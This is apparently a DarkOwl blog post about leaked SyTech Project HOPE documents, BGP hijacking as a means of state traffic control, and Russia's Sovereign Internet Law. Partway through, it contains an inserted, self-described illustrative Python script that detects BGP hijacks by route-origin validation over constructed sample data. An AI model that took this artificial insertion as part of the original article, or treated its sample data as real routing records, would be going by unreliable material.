Of particular interest for this post is a 260-page document that indicates it is the final version of the Scientific and Technical Report. This appears to have been delivered to the customer at the same time the PowerPoint was created and delivered. It includes details such as:

  • the required software and OS

  • shared libraries

  • server platforms

  • the inclusion of government connections.

There is also some discussion of the use of deep packet inspection to analyze traffic, and criteria that may be used to filter and direct traffic. The report suggests that the research goals were met on a small scale; this includes the development of “state machines” provided to ISPs and includes diagrams of the machines and their functionality.

KEY TAKEAWAYS

Visual Demonstrations of BGP hijacking (Source: Cloudflare)


These leaked documents show that SyTech and others were early in the development and testing phases of a project that was concerned with monitoring internet traffic, routing traffic based on state-developed criteria, and gaining control over internet access within the borders of Russia. In 2013-2014, when this project was underway, most work focused on what appears to be proof-of-concept/prototype development. To our knowledge, this was not tested on a larger scale, though the documents do indicate some concern over scalability. However, the PowerPoint indicated that large-scale testing would be the responsibility of a non-SyTech body and thus would not be included in these leaked project files. It should be noted that the involvement of other agencies in the HOPE project has not been reported in media reports to date.

Analysis of the technical documents suggests that control of internet traffic would be primarily accomplished by state-sponsored BGP hijacking. A full analysis of this process is outside the scope of this post, but effectively, BGP hijacking exploits the assumption that interconnected networks are telling the truth about which IP addresses they own in order to maliciously reroute internet traffic. In layman’s terms, it has been compared to swapping the exit signs on a stretch of freeway and rerouting traffic to the wrong exits while no one is watching the signs. BGP is managed by ISPs; considering the extensive research SyTech conducted into BGP traffic and the installation of technology at Russian ISPs, it is a strong possibility that BGP hijacking is the foundation for Russia’s plans to control the internet.
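The paragraph above describes the trust assumption that BGP hijacking abuses. The defensive counterpart is route-origin validation: checking each announced prefix against a list of Route Origin Authorizations (ROAs) that say which autonomous system may originate it. The block below is an added illustration written for this post and is not code from DarkOwl, SyTech, or the leaked documents; the ROAs, AS numbers, and announcement lines are constructed sample data, and the validation states follow RFC 6811 (`valid`, `invalid`, `not-found`). It flags the two hijack shapes the post alludes to: an announcement from an unauthorised origin, and a more-specific prefix carved out of a legitimately announced block.

```python
"""Route-origin validation over constructed BGP announcements (added example).

Not code from the DarkOwl post or the SyTech documents. ROAs, AS numbers and
announcement lines are constructed sample data standing in for an RPKI
validated cache and a route-collector feed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Roa:
    """Route Origin Authorization: `asn` may originate `prefix` up to `max_len`."""
    prefix: ipaddress.IPv4Network
    max_len: int
    asn: int


@dataclass(frozen=True)
class Announcement:
    prefix: ipaddress.IPv4Network
    as_path: Tuple[int, ...]  # leftmost = nearest neighbour, rightmost = origin AS

    @property
    def origin(self) -> int:
        return self.as_path[-1]


def parse_announcement(line: str) -> Announcement:
    """Parse a constructed 'prefix asn asn ... asn' route-collector style line."""
    prefix, *path = line.split()
    return Announcement(ipaddress.ip_network(prefix, strict=True),
                        tuple(int(a) for a in path))


def validate(ann: Announcement, roas: Iterable[Roa]) -> str:
    """RFC 6811 semantics: 'valid', 'invalid' or 'not-found'.

    'not-found' means no ROA covers the prefix, so nothing can be said;
    'invalid' means a ROA covers it but none authorises this origin at this
    prefix length, which is the signature of a hijack.
    """
    covering = [r for r in roas if ann.prefix.subnet_of(r.prefix)]
    if not covering:
        return "not-found"
    for r in covering:
        if r.asn == ann.origin and ann.prefix.prefixlen <= r.max_len:
            return "valid"
    return "invalid"


def find_hijacks(lines: Iterable[str], roas: Iterable[Roa]) -> List[Tuple[str, str]]:
    """Return (prefix, reason) for every announcement that validates as 'invalid'."""
    roas = list(roas)
    flagged = []
    for line in lines:
        ann = parse_announcement(line)
        if validate(ann, roas) != "invalid":
            continue
        covering = [r for r in roas if ann.prefix.subnet_of(r.prefix)]
        authorised_here = [r for r in covering if r.asn == ann.origin]
        if authorised_here:
            # Right origin, but announcing a prefix longer than any ROA permits.
            reason = f"AS{ann.origin} may originate only up to /{max(r.max_len for r in authorised_here)}"
        else:
            holders = sorted({r.asn for r in covering})
            reason = f"origin AS{ann.origin} is not authorised; ROA holders: {holders}"
        flagged.append((str(ann.prefix), reason))
    return flagged


# Constructed ROAs (documentation prefixes, private-use ASNs).
ROAS = [
    Roa(ipaddress.ip_network("192.0.2.0/24"), 24, 64500),
    Roa(ipaddress.ip_network("198.51.100.0/22"), 24, 64501),
]

# Constructed announcements as a route collector might record them.
SAMPLE_LINES = [
    "192.0.2.0/24 64510 64500",      # legitimate
    "192.0.2.0/25 64510 64666",      # more-specific from a foreign origin: hijack
    "198.51.100.0/24 64510 64501",   # legitimate, within max_len
    "198.51.100.0/25 64510 64501",   # right origin, but more specific than allowed
    "203.0.113.0/24 64510 64502",    # no ROA at all: unknown, not flagged
]

if __name__ == "__main__":
    for prefix, reason in find_hijacks(SAMPLE_LINES, ROAS):
        print(f"ALERT {prefix}: {reason}")
```

The more-specific case is the one to watch: because routers prefer the longest matching prefix, a /25 announced from anywhere wins over the legitimate /24 regardless of AS-path length, which is why origin validation must consider `max_len` and not just the origin AS. In production this logic sits behind an RPKI validator feeding routers via RTR; the toy above only shows the decision rule.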

Since HOPE was carried out, there has been a great amount of reporting and concern surrounding the development of Russia’s nation-wide intranet. DarkOwl analysts believe it is likely that HOPE became the foundation for what is now known as Russia’s Sovereign Internet Law.

Russia’s Sovereign Internet Law

On November 1, 2019, Russia’s Sovereign Internet Law took effect, giving Russian government officials a higher degree of control over the nation’s internet access and content. Ostensibly, the law is aimed to protect the nation’s cybersecurity by allowing government officials to block access to content when an “emergency” has been declared.

POLICY CHANGES DUE TO ENACTMENT OF THE LAW

In practice, the law has the largest impact on internet service providers located in Russia. Under this law, ISPs are required to:

1. Install equipment that routes Russian internet traffic through state-controlled servers in the country

2. Install equipment capable of deep-packet inspection, which is capable of not only identifying the source of traffic but the filtration of content

The first requirement is aimed at creating a new DNS system that can filter traffic in a way that data sent between Russians reaches its destination while any traffic directed towards foreign computers is discarded. Theoretically, this allows Russia to essentially “unplug” from the global internet while nation-wide Runet service is uninterrupted. This is purportedly to protect Russia in the event of foreign cyberattacks or sanctions that attempt to isolate the country’s internet presence; for example, when US Cyber Command cut off internet access to the infamous Kremlin-backed Internet Research Agency in efforts to defend the 2018 US Midterm Elections against foreign interference. Notably, this new DNS system is not expected to take effect until 2021.

The second requirement allows state regulators to filter traffic and block whatever they want on a granular level; elements as small as individual social media and forum posts can be examined and blocked based on the content of the messaging. Deep packet inspection (DPI) technology is universally used by ISPs to prioritize traffic and block unwanted protocols; however, in this case, the traffic is not controlled by the ISPs but rather by the Russian communications regulator Roskomnadzor. The language surrounding this aspect of the law is, likely purposefully, vague; the law gives regulators full discretion to decide what constitutes a security threat or dissent that may harm the “stability, security, and integrity” of the internet. According to open source reporting, tests of Russian DPI technology will continue in the Urals region until the end of 2019.

PUBLIC RECEPTION OF THE LAW

The degree to which the Russian government can control the flow of information due to this law has drawn strong reactions from both the Russian populace and international community.

According to research conducted by the Russian state-sponsored pollster, VTsIOM, 52% of Russians indicated they were opposed to the sovereign internet bill and the internet should play a role in “uniting the whole world”, while only 23% believed the internet should be limited to the country’s borders. Rallies opposing the bill in Moscow, Voronezh, and Khabarovsk were “some of the biggest protests” in years, totaling over 15,000 people in Moscow alone (though police estimated only 6500 attendees). The law has often been referred to as a digital Iron Curtain, harkening back to the Cold War separation of the USSR and the West.

Outside of Russia, the law has been almost universally condemned. Ten human rights, media, and Internet freedom organizations released a joint statement criticizing the law and calling on President Putin to not sign it – though he did one week after publication of the statement. They and others suggest that the law does not satisfactorily define what constitutes security threats and appropriate responses and lends the government too much discretion in how these laws will be enforced. There are also no legal protections for internet users to prevent ISPs from accessing, collecting, and selling the information gleaned via DPI. Many view this new law as continuing the erosion of internet freedoms in Russia; Freedom House categorizes Russia as “Not Free” and argues internet freedom is continuing to decline because of this law and other policies. For instance, according to a report from the Agora International Human Rights Group, someone in Russia was imprisoned for their online activities every 8 days in 2017.

Russian Protests against the Sovereign Internet Law (Source: Associated Press)


CRITICISMS OF THE LAW

Moving beyond criticisms based in human rights and social issues surrounding the law, numerous technical experts are skeptical that enforcement of the law is currently possible. Both the establishment of a nation-wide intranet and deep packet inspection of all traffic face numerous, possibly insurmountable, technical hurdles.

Many experts are quick to point out that the Russian development of their alternate DNS system is dissimilar to China’s Great Firewall; whereas China’s internet was developed via a small number of state-run network operators – with a goal of restricting access in mind – Russia’s internet has developed freely over the last 30 years. Undoing that development would be a monumental task; the more developed a country’s infrastructure, the more laborious the blackout procedure becomes. David Belson, the senior director of Internet Research and Analysis at Internet Society, told NPR:

“..there were dozens of existing internet exchange points in Russia, some of which have hundreds of participants… basically it’s challenging – if not impossible, I think – to completely isolate the Russian Internet.”

Twelve organizations oversee the root servers for the current DNS system; zero of these are located in Russia. Undoing those global network connections will be difficult, and this kind of regulatory model could risk damaging the reliability of internet connections in Russia. According to Sophos:

“Internet traffic isn’t like a pipe that can be turned on and off or diverted at will. It functions as a cooperative system in which Russian ISPs must peer traffic that is heading to other destinations in ways that belie simple concepts of internal and external, good and bad.”

Some predict that, if nation-wide separation from the global internet proves impossible, it will be more likely that specific regions within the country can be disconnected for short periods of time.

Previous attempts at using law to forbid a form of technology have failed; last year, Russia attempted to ban the messaging app Telegram for refusing to provide encryption keys to Russian authorities, to practically no effect, other than simultaneously blocking access to allowed content. Experts also point out that the rhetoric surrounding this bill regards protection from foreign cyberattacks, yet the DPI requirement of the law only serves to increase control of the internet within Russia. Law-abiding users will notice the change; the installation of DPI equipment across all ISPs in Russia has been compared to the crush of passengers trying to get on the Moscow metro at rush hour.

There is no consensus among experts on what impact this law will have long-term; it may lead to the types of human rights violations watchdogs are worried about, or it could cause no change at all. It is also uncertain how this law may impact Russian darknet activity, even among Russian darknet users (Figure 8). Activity may increase as users seek to circumvent the newly enacted law; it may decrease if the technology implemented is sophisticated enough to limit dark web activity. Theoretically, BGP hijacking could manipulate and control entry relay node traffic, which would destroy the anonymity provided by Tor for Russian users.

Russia has a sizable presence on the dark web and is the most common foreign language in DarkOwl’s database; DarkOwl will continue to monitor this activity for any changes or modifications of dark web use.

Final takeaways: Project HOPE, Russia’s new restrictive law, and the internet as a human rights issue

CONCLUSIONS REGARDING THE LEAKED PROJECT HOPE DOCUMENTS

Upon revisiting the questions we sought to answer during our analysis of the leaked documents, we were able to come to several conclusions:

1. Examine the extent of leaked information – were only project summaries leaked, or entire proprietary technical plans?

Hackers leaked extensive documentation surrounding the HOPE project on the dark web. The leak included project summaries, supporting technical documents, test results, and the final customer product. It is clear there was much more leaked than what was reported via most media sources and raises numerous questions over what is contained in the leaks of other projects from SyTech.

2. Examine the impact of leaked information – did this leak impact or result in any legal or social issues in the future?

Although it cannot be directly linked, the preponderance of evidence suggests that HOPE was a precursor to Russia’s Sovereign Internet Law. The stated goals and methods discussed in HOPE directly reflect the realities of the Sovereign Internet Law. Though the official response minimized the impact of these leaks, the documents demonstrate a clear connection to future legal and social developments.

3. Examine the utility in analyzing leaked information – do the resources expended to acquire and analyze these documents produce actionable intel, open further lines of inquiry, or increase our knowledge base surrounding these issues?

The examination of these documents provided insights unavailable in any other report or analysis of the SyTech hack. Considering the information obtained and that HOPE likely resulted in a divisive law, future research should be conducted on the other leaked documents in efforts to predict other future policy or technological development.

THE INTERNET AS A HUMAN RIGHTS ISSUE

The United Nations Human Rights Council (UNHRC) has consistently stressed the importance of taking a human rights based approach to internet access. In June of 2016, the UNHRC passed resolution A/HRC/38/L.20, addressing “the promotion, protection, and enjoyment of human rights on the internet.” The resolution affirms that the “same rights people have offline must be protected online,” and outlines the perceived importance of internet access to the human rights protections of the citizens of member nations. 

Press coverage of the initiative reported that, despite passing with consensus, Russia and China opposed this resolution and sought to remove language relating to the “human-rights based approach” to internet access. This is relatively unsurprising; China’s “Great Firewall” approach to internet censorship is well-documented by academics, human rights watchdogs, and western media. Furthermore, the notion of free access and usage of the internet has been under attack by various nation-states, as reports of government-backed nationwide internet outages, social media blackouts during military conflict, the criminalization of dissent, and the murder of bloggers and journalists have only increased in the public eye since the passing of this resolution.

The UNHRC further demonstrated this commitment to internet freedom in July of 2018 when they reaffirmed the internet protection resolution – with no States formally dissociating from the language in the resolution. However, the emphasis on protecting human rights online as well as offline is minimized in this resolution, and the United States no longer is listed as a participating State.

Further developments have shown no signs of Russia slowing down in their pursuit of state-controlled internet, often hiding behind a veil of curbing cybercrime. Other nations such as Iran have followed suit and have begun exercising control over internet access.

WILL THESE NEW RESTRICTIONS LEAD TO AN INCREASE IN DARK WEB USERSHIP?

In name, the Russian Sovereign Internet Law is already in effect. However, the social impact from this law will not be felt until later, and it is uncertain how this law will alter the amount and type of activity on the dark web, if at all.

Fundamental changes in the structure of the internet don’t occur overnight, or over just a few years – research, development, and implementation of this technology took nearly a decade via the HOPE project, and still isn’t close to completion. If we want to see what is coming next, it may be best to look at similar projects that are being researched now rather than wait for their deployment.

Copyright © 2024 DarkOwl, LLC All rights reserved.